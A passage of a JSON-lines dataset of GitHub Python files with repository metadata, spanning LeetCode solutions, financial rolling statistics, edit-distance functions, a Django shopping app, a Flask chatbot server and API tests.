\"DCCCC\")\n for char in s:\n number += translations[char]\n return number\n'''\n# @lc code=end\n\n","repo_name":"HongyuZhu999/LeetCode","sub_path":"13.roman-to-integer.py","file_name":"13.roman-to-integer.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15697353945","text":"import webbrowser\nimport sys\nimport requests\nimport bs4\n\n\ndef main():\n print(\"hello\")\n\n search_url: str = \"https://pypi.org/search/?q=\"\n\n if len(sys.argv) == 2:\n package_name: str = sys.argv[1]\n\n res = requests.get(search_url+package_name)\n res.raise_for_status()\n\n soup = bs4.BeautifulSoup(res.text, 'html.parser')\n search_results = soup.select('.package-snippet')\n\n tabs_to_open: int = min(5, len(search_results))\n\n for i in range(tabs_to_open):\n url_to_open = \"https://pypi.org/\" + search_results[i].get('href')\n print(\"Opening: \" + url_to_open)\n\n webbrowser.open(url_to_open)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Atropos148/AutomateTheBoringStuff2E","sub_path":"pypi_result_opener.py","file_name":"pypi_result_opener.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30600927725","text":"class Solution(object):\n def mySqrt(self,x):\n if(x==0):return 0\n s=len(str(x))\n l=s/2\n d=s%2\n if(d==0):\n Max=10**(l)\n Min=3*10**(l-1)\n else:\n Max=4*10**(l)\n Min=10**(l)\n print(Min,Max)\n while (Min+1!=Max):\n if(x==Max**2):return Max\n k=(Min+Max)/2\n # print(k)\n if (xk^2):\n Min=k\n # else:\n # return k\n # print(Min,Max)\n print(Min,Max)\n return Min\n \nA=Solution()\na=A.mySqrt(984230921)\nprint(a)","repo_name":"RaindropSaber/leetcode","sub_path":"69.py","file_name":"69.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37407574654","text":"import empyrical as em\nimport numpy as np\nimport pandas as pd\nfrom empyrical.stats import (\n _aligned_series,\n _create_unary_vectorized_roll_function,\n rolling_window,\n)\n\n\ndef rfill(roll_res, window):\n if isinstance(roll_res, pd.Series):\n res = roll_res.values.tolist()\n elif isinstance(roll_res, np.ndarray):\n res = roll_res.tolist()\n return np.array([np.nan] * (window - 1) + res)\n\n\ndef vol_diff(price_vol_data, lkb):\n # Compute sum of volume of past `lkb` to `lkb-1` days for days that are above current price,\n # and for days that are below current price.\n # Then, take the difference of the 2 sum - to measure how much volume is traded under/above the latest price.\n # price_vol_data = df[[\"Price\", \"Volume\"]].values\n # Formula: VD = SUM_{P0 > Pt} Vt - SUM_{P0 < Pt} Vt\n # Bullish if total volume below current price is greater than total volume above current price.\n z1 = rolling_window(price_vol_data, lkb) # [-1]\n above = z1[:, -1:, 0] > z1[:, :-1, 0]\n below = z1[:, -1:, 0] < z1[:, :-1, 0]\n vol_sum_above = (z1[:, :-1, 1] * above).sum(axis=1)\n vol_sum_below = (z1[:, :-1, 1] * below).sum(axis=1)\n vol_diff = vol_sum_above - vol_sum_below\n return rfill(vol_diff, lkb)\n\n\ndef term_zscore(x, short=20, long=252, stdev=252):\n return (x.rolling(short).mean() - x.rolling(long).mean()) / x.rolling(stdev).std()\n\n\ndef stochastic_oscillator(x, lkb):\n rw = x.rolling(lkb)\n return (x - rw.min()) / (rw.max() - rw.min())\n\n\ndef roll_zscore(x, mean_lkb, std_lkb):\n return (x - x.rolling(mean_lkb).mean()) / x.rolling(std_lkb).std()\n\n\ndef roll_alpha_beta(returns, benchs, window):\n x = em.roll_alpha_beta(returns, benchs, window)\n return x.iloc[:, 0], x.iloc[:, 1]\n\n\ndef roll_alpha_beta_down(returns, benchs, window):\n benchs_down = benchs[benchs < 0]\n x = em.roll_alpha_beta(returns, benchs_down, window)\n return x.iloc[:, 0], x.iloc[:, 1]\n\n\ndef roll_alpha_beta_up(returns, benchs, window):\n benchs_up = benchs[benchs > 0]\n x = em.roll_alpha_beta(returns, benchs_up, window)\n return x.iloc[:, 0], x.iloc[:, 1]\n\n\ndef roll_exponential_regression(returns, windows):\n x = returns.copy()\n if isinstance(returns, pd.Series):\n x = returns.values\n\n wins = rolling_window(x, windows) # construct rolling windows\n Y = np.log(1 + em.cum_returns(wins.T))\n x = np.arange(1, windows + 1, 1)\n X = np.c_[x, np.ones_like(x)]\n coeffs = np.polyfit(x, Y, 1) # [:,0]\n Yhat = X @ coeffs\n ybar = Yhat.mean(axis=0)\n ssreg = np.sum(np.power(Yhat - ybar, 2), axis=0)\n sstot = np.sum(np.power(Y - ybar, 2), axis=0)\n determination = ssreg / sstot\n slope = coeffs[0, :]\n intercept = coeffs[1, :]\n\n if isinstance(returns, pd.Series):\n slope = pd.Series(slope, returns.index[(windows - 1) :])\n intercept = pd.Series(intercept, returns.index[(windows - 1) :])\n determination = pd.Series(determination, returns.index[(windows - 1) :])\n return determination, slope, intercept\n\n\ndef roll_standard_regression(price_x, price_y, windows):\n if isinstance(price_x, pd.Series) and isinstance(price_y, pd.Series):\n gen = _aligned_series(price_x, price_y)\n x, y = [j for j in gen]\n idx = x.index\n x, y = x.values, y.values\n else:\n assert len(price_x) == len(price_y)\n x, y = price_x, price_y\n wins_x = rolling_window(x, windows) # construct rolling windows\n wins_y = rolling_window(y, windows) # construct rolling windows\n coeffs = [np.polyfit(x1, y1, 1) for x1, y1 in zip(wins_x, wins_y)]\n slope = [j[0] for j in coeffs]\n intercept = [j[1] for j in coeffs]\n\n coeffs = np.array(coeffs)\n slopes, intercepts = coeffs[:, 0], coeffs[:, 1]\n\n yhat = slopes[:, np.newaxis] * wins_x\n ybar = yhat.mean(axis=1)\n ssreg = np.sum(np.power(yhat - ybar[:, np.newaxis], 2), axis=1)\n sstot = np.sum(np.power(wins_y - ybar[:, np.newaxis], 2), axis=1)\n determination = ssreg / sstot\n\n slopes = rfill(slopes, windows)\n intercepts = rfill(intercepts, windows)\n determination = rfill(determination, windows)\n\n if isinstance(price_x, pd.Series) and isinstance(price_y, pd.Series):\n slopes = pd.Series(slopes, index=idx)\n intercepts = pd.Series(intercepts, index=idx)\n determination = pd.Series(determination, index=idx)\n yhat = pd.Series(yhat, index=idx)\n\n return determination, slopes, intercepts\n\n\ndef cagr_em(returns, annualized_factor=252, days=None, out=None):\n \"\"\"faster implementation for roll_cagr_em only\n use metrics_functions.cagr for non-rolling computation\n parameters:\n days - not used!\n \"\"\"\n\n allocated_output = out is None\n if allocated_output:\n out = np.empty(returns.shape[1:])\n\n return_1d = returns.ndim == 1\n\n if len(returns) < 2:\n out[()] = np.nan\n if return_1d:\n out = out.item()\n return out\n\n ann_factor = annualized_factor\n out = em.cagr(returns, annualization=ann_factor)\n if return_1d:\n out = out.item()\n return out\n\n\ndef roll_drawdown(x, window, min_periods=1):\n y = (x + 1).cumprod()\n return y / y.rolling(window, min_periods=min_periods).max() - 1\n\n\nroll_cagr = _create_unary_vectorized_roll_function(cagr_em)\nroll_max_drawdown = em.roll_max_drawdown\n","repo_name":"etq-quant/etqbankloan","sub_path":"src/roll.py","file_name":"roll.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27480592221","text":"import cv2\nfrom pyardrone import ARDrone\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclient = ARDrone()\nclient.video_ready.wait()\ntry:\n while True:\n cv2.imshow('im', client.frame)\n if cv2.waitKey(10) == ord(' '):\n break\nfinally:\n client.close()\n","repo_name":"afq984/pyardrone","sub_path":"examples/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"6"} +{"seq_id":"7176969869","text":"from typing import (\n Type,\n)\n\nfrom eth_utils import (\n encode_hex,\n)\n\nfrom eth.abc import (\n ComputationAPI,\n SignedTransactionAPI,\n TransactionExecutorAPI,\n)\nfrom eth.vm.forks.homestead.state import (\n HomesteadState,\n HomesteadTransactionExecutor,\n)\n\nfrom ._utils import (\n collect_touched_accounts,\n)\nfrom .computation import (\n SpuriousDragonComputation,\n)\n\n\nclass SpuriousDragonTransactionExecutor(HomesteadTransactionExecutor):\n def finalize_computation(\n self, transaction: SignedTransactionAPI, computation: ComputationAPI\n ) -> ComputationAPI:\n computation = super().finalize_computation(transaction, computation)\n\n #\n # EIP161 state clearing\n #\n touched_accounts = collect_touched_accounts(computation)\n\n for account in touched_accounts:\n should_delete = self.vm_state.account_exists(\n account\n ) and self.vm_state.account_is_empty(account)\n if should_delete:\n self.vm_state.logger.debug2(\n \"CLEARING EMPTY ACCOUNT: %s\",\n encode_hex(account),\n )\n self.vm_state.delete_account(account)\n\n return computation\n\n\nclass SpuriousDragonState(HomesteadState):\n computation_class: Type[ComputationAPI] = SpuriousDragonComputation\n transaction_executor_class: Type[\n TransactionExecutorAPI\n ] = SpuriousDragonTransactionExecutor\n","repo_name":"ethereum/py-evm","sub_path":"eth/vm/forks/spurious_dragon/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":2109,"dataset":"github-code","pt":"6"} +{"seq_id":"30441967555","text":"# существует много календарей и, соответственно, много систем подсчета високосных дней\r\n# тут представлены юлианский, григорианский и еврейский\r\n# хотел сделать еще исламский, но там настолько невменяемые алгоритмы подсчета (да и, строго говоря,\r\n# там, скорее високосные месяцы, а не годы), что проще его просто табличкой захардкодить\r\n\r\n\r\ndef JulLeapYear(year): #юлианский\r\n if year % 4 == 0:\r\n return True\r\n else:\r\n return False\r\n\r\ndef GregLeapYear(year): #григорианский\r\n if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\r\n return True\r\n else:\r\n return False\r\n\r\ndef HebrLeapYear(year): #еврейский\r\n if ((((year*7)+1) % 19) < 7):\r\n return True\r\n else:\r\n return False\r\n\r\n# поехали считать\r\nprint('Введите год')\r\nyear = int(input()) #по-хорошему надо проверить, год ли вообще ввел юзер, но мне лениво\r\nprint('Введите цифрой вид календаря, по которому вы желаете определить високосность года: 1 - Юлианский, 2 - Григорианский, 3 - Еврейский')\r\nCal_type = int(input())\r\nCal_var = [1,2,3] #зато проверим, корректно ли он обозначил календарь\r\nif Cal_type in Cal_var:\r\n if Cal_type == 1:\r\n print(JulLeapYear(year))\r\n elif Cal_type == 2:\r\n print(GregLeapYear(year))\r\n elif Cal_type == 3:\r\n print(HebrLeapYear(year))\r\nelse: \r\n print('Вы некорректно ввели тип календаря, попробуйте перезапустить скрипт')\r\n","repo_name":"SperryUNIVAC/PYDA14","sub_path":"Lecture_02/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3375152589","text":"# -*- coding = utf-8 -*-\n# @Time: 2022/2/8 13:58\n# @Author: Anshang\n# @File: img_process.py\n# @Software: PyCharm\nimport _thread\n\nimport requests\nimport re\n\nUA = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.76\"\nheaders = {\n \"User-Agent\": UA,\n}\n\n\ndef download(url, book_name, changed_url, img_counter):\n img_file = requests.get(url, headers=headers).content\n with open(book_name + \"/OEBPS\" + changed_url, \"wb\") as f:\n f.write(img_file)\n f.close()\n # print(book_name, \"pic\", img_counter[1], \"download finish\")\n img_counter[1] = img_counter[1] + 1\n\n\nimg_re = re.compile(r\"\")\nurl_re = re.compile(r'src=\"(?P.*?)\"')\n\n\ndef img_process(src, img_counter,book_name=None):\n imgs = img_re.finditer(src)\n for img in imgs:\n url = url_re.search(img.group()).group(\"url\")\n file_name = url.split('/')[-1]\n changed_url = \"/Images/\" + file_name\n src = src.replace(url, \"..\"+changed_url)\n img_counter[0] = img_counter[0] + 1\n if url.startswith(\"/\"):\n url = \"https://www.lightnovel.app\" + url\n _thread.start_new_thread(download, (url, book_name, changed_url, img_counter))\n return src\n\n","repo_name":"anshangPro/SpiderForLightNovelShift","sub_path":"img_process.py","file_name":"img_process.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"41245144750","text":"import pandas as pd\n\n#PASSO1: PEGAR E IMPORTAR BASE DE DADOS\ntabela = pd.read_csv(r'C:\\Users\\andre\\OneDrive\\Documentos\\GitHub\\Python\\Intensivão de Python\\Aula 2 - análise de dados\\clientes.csv', encoding='latin', sep=';')\n\n\n\n#PASSO2: VISUALIZAR BASE DE DADOS\n\n#Entender informações que você tem disponíveis\n#entender as caracteristicas dos clientes\n#Procurar as \"cagadas\" na base de dados\n#identificada coluna \"Unnamed: 8\" vazia que foi deletada\n#deletar colunas inuteis\ntabela = tabela.drop('Unnamed: 8', axis = 1)\n#axis = 0 --> deletar a linha axis = 1 --> deletar uma coluna\n\n#PASSO3: TRATAMENTO DE DADOS\n#valores no formato errado\n#converte a coluna \"Salário Anual (R$)\" para numérico e o parametro 'coerce' força a virar numérico no caso deixa ele vazio caso aja algum erro\ntabela['Salário Anual (R$)'] = pd.to_numeric(tabela['Salário Anual (R$)'], errors='coerce') \n#valores vazios\ntabela = tabela.dropna() # exclui todas as linhas que estão vazias\n#print(tabela.info())\n\n#PASSO4: ANÁLISE INÍCIAL\nprint(tabela) ","repo_name":"andrematos90/Python","sub_path":"HashTagTreinamentos/Aula 2 - análise de dados/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34268253148","text":"\"\"\"\nPure, single-file implementations of various edit distances, including\nHamming, Levenshtein, Levenshtein (normalized), Levenshtein (recursive),\nand Damerau-Levenshtein distances.\n\"\"\"\n__author__ = \"Carlton Shepherd\"\n\n\ndef _wagner_fischer(a: str, b: str, method: list) -> int:\n \"\"\"\n Implements the Wagner-Fischer dynamic programming algorithm [1,2].\n\n Counts insertions, deletions, transpositions and substitutions\n depending on the method.\n\n 1. R. Wagner and M. Fisher, \"The string to string correction problem,\" \n Journal of the ACM, 21:168-178, 1974.\n 2. https://en.wikipedia.org/wiki/Wagner%E2%80%93Fischer_algorithm\n\n Parameters:\n a: First string\n b: Second string\n method: Distance method (\"lev\", \"dl\"), i.e. Levenshtein or\n Damerau-Levenshtein respectively.\n Returns:\n Wagner-Fisher cost (integer).\n \"\"\"\n a_len, b_len = len(a), len(b)\n\n if a_len == 0:\n return b_len\n elif b_len == 0:\n return a_len\n\n _a, _b = \" \" + a, \" \" + b\n a_len, b_len = len(_a), len(_b)\n dist_matrix = [[0] * a_len for _ in range(b_len)]\n\n for i in range(a_len):\n dist_matrix[0][i] = i\n\n for j in range(b_len):\n dist_matrix[j][0] = j\n\n for j in range(1, b_len):\n for i in range(1, a_len):\n if _a[i] == _b[j]:\n dist_matrix[j][i] = dist_matrix[j-1][i-1]\n else:\n dist_matrix[j][i]= min(dist_matrix[j][i-1], \n dist_matrix[j-1][i],\n dist_matrix[j-1][i-1]) + 1\n if method == \"dl\":\n if i and j and _a[i] == _b[j-1] and _a[i-1] == _b[j]:\n dist_matrix[j][i] = min(\n dist_matrix[j][i],\n dist_matrix[j-2][i-2]+1)\n return dist_matrix[-1][-1]\n \n\ndef _lcs_dp(a: str, b:str) -> int:\n \"\"\"\n A somewhat simpler dynamic programming algorithm for LCS.\n\n Parameters:\n a: First string\n b: Second string\n Returns:\n LCS length (integer)\n \"\"\"\n if len(a) == 0 or len(b) == 0:\n return 0\n\n a_len, b_len = len(a)+1, len(b)+1\n dist_matrix = [[0] * (a_len) for _ in range(b_len)]\n\n for j in range(b_len):\n for i in range(a_len):\n if i == 0 or j == 0:\n dist_matrix[j][i] = 0\n elif a[i-1] == b[j-1]:\n dist_matrix[j][i] = dist_matrix[j-1][i-1]+1\n else:\n dist_matrix[j][i] = max(dist_matrix[j-1][i],\n dist_matrix[j][i-1])\n return dist_matrix[-1][-1]\n \n\ndef levenshtein(a: str, b: str) -> int:\n \"\"\"\n Computes the Levenshtein distance: the number of\n insertions, deletions or substitutions required\n to transform a -> b.\n\n Uses the Wagner-Fischer dynamic programming algorithm.\n \n Parameters:\n a: First string\n b: Second string\n Returns:\n Levenshtein distance (integer)\n \"\"\"\n return _wagner_fischer(a, b, \"lev\")\n\n\ndef levenshtein_recursive(a: str, b: str) -> int:\n \"\"\"\n Computes the Levenshtein distance using the naive\n recursive implementation.\n\n See: https://en.wikipedia.org/wiki/Levenshtein_distance\n\n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Levenshtein distance (integer)\n \"\"\"\n if len(a) == 0:\n return len(b)\n elif len(b) == 0:\n return len(a)\n elif a[0] == b[0]:\n return levenshtein_recursive(a[1:], b[1:])\n else:\n return 1 + min(levenshtein_recursive(a[1:], b),\n levenshtein_recursive(a, b[1:]),\n levenshtein_recursive(a[1:], b[1:]))\n\n\ndef normalized_levenshtein(a: str, b: str) -> float:\n \"\"\"\n Implements the normalized Levenshtein metric by Yujian & Bo [1].\n\n 1. L. Yujian and L. Bo, \"A normalized Levenshtein distance metric,\" \n IEEE Transactions on Pattern Analysis and Machine Intelligence (2007).\n https://ieeexplore.ieee.org/document/4160958\n\n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Normalized Levenshtein distance (float)\n \"\"\"\n a_len, b_len = len(a), len(b)\n d = levenshtein(a, b)\n dem = ((a_len+b_len) + d)\n try:\n return (2 * d) / ((a_len+b_len) + d)\n except ZeroDivisionError:\n return 0.0\n\n\ndef damerau_levenshtein(a: str, b: str) -> int:\n \"\"\"\n Computes the Damerau-Levenshtein distance: the number of\n insertions, deletions, substitutions, and transpositions needed\n to transform a -> b.\n\n Uses the Wagner-Fischer algorithm.\n\n Parameters:\n a: First string\n b: Second string\n Returns:\n Damerau-Levenshtein distance (integer)\n \"\"\"\n return _wagner_fischer(a, b, \"dl\")\n\n\ndef hamming(a: str, b: str) -> int:\n \"\"\"\n Finds the Hamming distance, the number of substitutions\n (only) to transform a -> b.\n\n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Hamming distance (integer)\n \"\"\"\n if len(a) != len(b):\n raise ValueError(\"Inputs must be of equal length!\")\n return sum([1 for i, j in zip(a, b) if i != j ])\n\n\ndef longest_common_subsequence(a: str, b: str) -> int:\n \"\"\"\n Finds the longest common subsequence (LCS) of two strings.\n \n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Longest common subsequence (integer)\n \"\"\"\n return _lcs_dp(a, b)\n\n\ndef distance(a: str, b: str, method: str):\n \"\"\"\n Wrapper function for calculating the distance of two strings\n using a given method.\n\n Parameters:\n a: First string\n b: Second string\n c: Distance metric, one of: ['levenshtein',\n 'normalized_levenshtein', 'levenshtein_recurisve',\n 'damerau-levenshtein', 'hamming']\n\n Returns:\n Distance of a and b using the given method\n \"\"\"\n if method == \"levenshtein\":\n return levenshtein(a, b)\n elif method == \"levenshtein_recursive\":\n return levenshtein_recursive(a, b)\n elif method == \"normalized_levenshtein\":\n return normalized_levenshtein(a, b)\n elif method == \"damerau_levenshtein\":\n return damerau_levenshtein(a, b)\n elif method == \"hamming\":\n return hamming(a, b)\n elif method == \"lcs\":\n return longest_common_subsequence(a, b)\n else:\n raise ValueError(\"Invalid method! Must be one of: \" \\\n \"['levenshtein', 'normalized_levenshtein', \" \\\n \"'levenshtein_recursive', 'damerau-levenshtein', \" \\\n \"'lcs', 'hamming']\")\n","repo_name":"cgshep/pyeditdistance","sub_path":"src/pyeditdistance/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73918948026","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django import template\nfrom .forms import SignupForm, AddItemToCart, DeliverInfo, CartForm, SearchItem\nfrom .models import Cart, Order, PurchasedProduct, Warehouse\nfrom django.contrib import messages\nfrom django.views.generic import CreateView, ListView, UpdateView, DeleteView, DetailView, FormView\nfrom django.template.defaulttags import register\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nimport socket\n\n# Create your views here.\n\nback_end_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntry: \n back_end_socket.connect((\"vcm-12231.vm.duke.edu\", 65432))\nexcept BaseException as e:\n print(\"Migrating...\")\n\ndef receive_backend_response():\n front_end_request = \"\"\n bit = back_end_socket.recv(1)\n bit = bit.decode()\n while bit != \"\\n\":\n front_end_request += bit\n bit = back_end_socket.recv(1)\n bit = bit.decode()\n return front_end_request\n\nclass CartDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Cart\n template_name = 'item_delete.html'\n success_url = '/amazon/myCart' \n \n def delete(self, request, *args, **kwargs):\n return super(CartDeleteView, self).delete(request, *args, **kwargs)\n\n def test_func(self):\n cart = self.get_object()\n if self.request.user == cart.userid:\n return True\n return False\n\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n form.save()\n # messages.success(request, 'Account created successfully')\n return redirect('login')\n else:\n form = SignupForm()\n return render(request, 'signup.html', context={'form': form})\n\n@login_required(login_url='../accounts/login/')\ndef search_item(request):\n if request.method == 'POST':\n form = SearchItem(request.POST)\n if form.is_valid():\n url = form.cleaned_data['item_name'] + \"/Add\"\n return redirect(url)\n else:\n form = SearchItem()\n\n return render(request, 'search_item.html', context={'form': form})\n\n@login_required(login_url='../accounts/login/')\ndef add_to_cart(request, product_name):\n if request.method == 'POST':\n form = AddItemToCart(request.POST)\n if form.is_valid():\n current_cart = Cart\n if current_cart.objects.filter(product_name = product_name, userid = request.user).exists():\n current_product = get_object_or_404(Cart, pk=product_name)\n current_product.count += form.cleaned_data['quantity']\n current_product.save()\n else:\n cart = Cart()\n cart.userid = request.user\n cart.product_name = product_name\n cart.count = form.cleaned_data['quantity']\n cart.save()\n messages.success(request, 'item added!')\n back_end_request = \"purchase more:\" + product_name + \"-\" + str(form.cleaned_data['quantity']) + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n return redirect('/')\n else:\n form = AddItemToCart()\n return render(request, 'add_item.html', context={'form': form, 'product_name':product_name})\n\nclass check_my_cart(LoginRequiredMixin, ListView):\n model = Cart\n template_name = 'check_my_cart.html'\n context_object_name = 'qs'\n def get_queryset(self):\n qs = Cart.objects.filter(userid=self.request.user)\n return qs\n \n@login_required(login_url='../accounts/login/')\ndef place_order(request):\n if request.method == 'POST':\n form = DeliverInfo(request.POST)\n if form.is_valid():\n locationx = form.cleaned_data[\"location_x\"]\n locationy = form.cleaned_data[\"location_y\"] \n ups_name = form.cleaned_data[\"ups_username\"]\n user_cart = Cart.objects.filter(userid = request.user)\n products = \"\"\n for (i, product) in enumerate(user_cart):\n inventory = get_object_or_404(Warehouse, product_name = product.product_name)\n if inventory.total_number < product.count:\n order_status = \"Order failed:\" + product.product_name + \" is out of stock\"\n messages.success(request, order_status)\n return redirect('/')\n products += product.product_name + \",\" + str(product.count) + \"-\"\n products = products[:-1]\n back_end_request = \"new order:\" + str(request.user.id) + \"-\" + products + \"-\" + str(locationx) + \"-\" + str(locationy) + \"-\" + ups_name + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n messages.success(request, \"Order succeed!\")\n return redirect('/')\n else:\n form = DeliverInfo(initial = {\"location_x\": request.user.location_x, \"location_y\": request.user.location_y, \"ups_username\": request.user.ups_name})\n return render(request, 'place_order.html', context={'form': form})\n\nclass view_my_order(LoginRequiredMixin, ListView):\n template_name = 'order_list_1.html'\n context_object_name = 'order_list'\n def get_queryset(self): \n return Order.objects.filter(owner = self.request.user)\n \nclass CartUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Cart\n fields = ['count']\n template_name = 'item_update.html'\n \n def form_valid(self, form):\n item = self.get_object()\n item.count = form.cleaned_data.get('count')\n back_end_request = \"purchase more:\" + item.product_name+ \"-\" + str(item.count) + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n item.save()\n return super(CartUpdateView, self).form_valid(form)\n\n def test_func(self):\n item = self.get_object()\n if self.request.user == item.userid:\n return True\n return False \n\n def get_success_url(self):\n messages.success(self.request, 'Cart Updated')\n success_url = '/amazon/myCart' \n return success_url\n\n'''\n@login_required\ndef CartUpdateView(request, cart_pk):\n template_name = 'item_update.html'\n\n form = CartForm()\n if request.method == \"POST\":\n form = CartForm(request.POST)\n if form.is_valid():\n new_count = form.cleaned_data.get(\"count\")\n item = Cart.objects.get(pk = cart_pk)\n item.count = new_count\n item.save()\n back_end_request = \"purchase more:\" + item.product_name+ \"-\" + str(new_count) + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n\n return redirect(\"/amazon/myCart\")\n\n else:\n return render(request, template_name, context = { \"form\"})\n'''","repo_name":"xwgnick/MiniAmzon","sub_path":"Amazon/code/FrontEnd/amazonapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11910998647","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport glob\n# parser = argparse.ArgumentParser(description=\"\"\"get text from transcripts\"\"\")\n# parser.add_argument('input_transcript', type=str, help='File name of a file that contains the'\n# 'text. Each line must be: ...')\n# parser.add_argument('output_transcript', type=str, help='Output file that contains transcript')\ndef main():\n\n # args = parser.parse_args()\n # input_transcript = '/Users/ashisharora/Desktop/root/corpora/TDCorpus/topic_text'\n # text_file_handle = open(input_transcript, 'r', encoding='utf8')\n # text_file_data = text_file_handle.read().strip().split(\"\\n\")\n list_of_files = glob.glob('/Users/ashisharora/Desktop/root/corpora/TDCorpus/topics/*.txt')\n output_transcript = '/Users/ashisharora/Desktop/root/corpora/TDCorpus/topic_text'\n output_transcript_handle = open(output_transcript, 'w', encoding='utf8')\n for file_name in list_of_files:\n text_file_handle = open(file_name, 'r', encoding='utf8')\n text_file_data = text_file_handle.read().strip().split(\"\\n\")\n file_name = file_name.strip().split('/')[-1]\n for line in text_file_data:\n parts = line.strip().split()\n topic_info = \" \".join(parts)\n output = file_name + ' ' + topic_info\n output_transcript_handle.write(output + '\\n')\n\n\nif __name__ == '__main__':\n main()","repo_name":"aarora8/single_file_scripts","sub_path":"analysing_topics/fix_spaces_in_transcript.py","file_name":"fix_spaces_in_transcript.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72680290107","text":"from gevent import monkey\n\nmonkey.patch_all()\nfrom flask import Flask, render_template, request, jsonify\nimport tensorflow as tf\nimport numpy as np\nfrom s2s import create_model, FLAGS\nimport data_utils\n\nbuckets = data_utils.buckets\napp = Flask(__name__)\n\n\nclass TestBucket(object):\n def __init__(self, sentence):\n self.sentence = sentence\n\n def random(self):\n return self.sentence, ''\n\n\ngpu_memory_fraction = 0.5\ngpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_memory_fraction, allow_growth=True)\nsess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))\n#  构建模型\nmodel = create_model(sess, True)\nmodel.batch_size = 1\n# 初始化变量\nsess.run(tf.global_variables_initializer())\nwith tf.Graph().as_default():\n ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)\n if ckpt and ckpt.model_checkpoint_path:\n model.saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n raise FileNotFoundError('Having no model') # Get input and output tensors\n\n\n # 显示首页\n @app.route('/')\n def index():\n return render_template('index.html')\n\n\n # 调用回复\n @app.route('/chart')\n def chart():\n # 獲取前端传递过来的文本\n sentence = request.args.get('sentence')\n\n # # 1. 意图识别\n # flag = model1.predict(sentence)\n # if flag == '意图1':\n # # 调用\n # ret = chat_model1.predict(buckets, sentence, TestBucket(sentence), sess)\n # elif flag == '意图2':\n # # 调用\n # ret = chat_model2.predict(buckets, sentence, TestBucket(sentence), sess)\n # elif flag == '意图3':\n # # 调用\n # ret = chat_model3.predict(buckets, sentence, TestBucket(sentence), sess)\n # else:\n # # 闲聊模式\n # ret = model.predict(buckets, sentence, TestBucket(sentence), sess)\n\n # 调用\n ret = model.predict(buckets, sentence, TestBucket(sentence), sess)\n return jsonify({'state': 0, 'result': ret})\n\nif __name__ == '__main__':\n app.run(host=\"192.168.1.9\", port=\"8888\")\n","repo_name":"exueyuan/ChatBotYellowChicken","sub_path":"sever.py","file_name":"sever.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26932254615","text":"import pytest\nimport json\nimport requests\nfrom Common.params import Params\nfrom Conf.Config import Config\nfrom Common import Assert\n\n\nclass TestLauncherIsConfig:\n def test_response_data_format(self):\n \"\"\"\n 用例描述:课程/课程表配置查询接口默认参数状态码返回和返回格式JsonSchema格式验证\n :return:\n \"\"\"\n conf = Config()\n test = Assert.Assertions()\n\n host = conf.debug_goss_host\n api_url = host + \"/api/v1/launcher/isConfig\"\n headers = conf.debug_headers\n params = Params().non_encrypted_data({'sourceId': '10001', 'sourceType': 2})\n\n res = requests.post(api_url, params=params, headers=headers)\n schema = json.load(open(conf.json_schema_path + \"/launcher_is_config_schema.json\"))\n\n assert test.assert_code(res.status_code, 200)\n assert test.assert_jsonschema(res.json(), schema)\n\n\nif __name__ == '__main__':\n 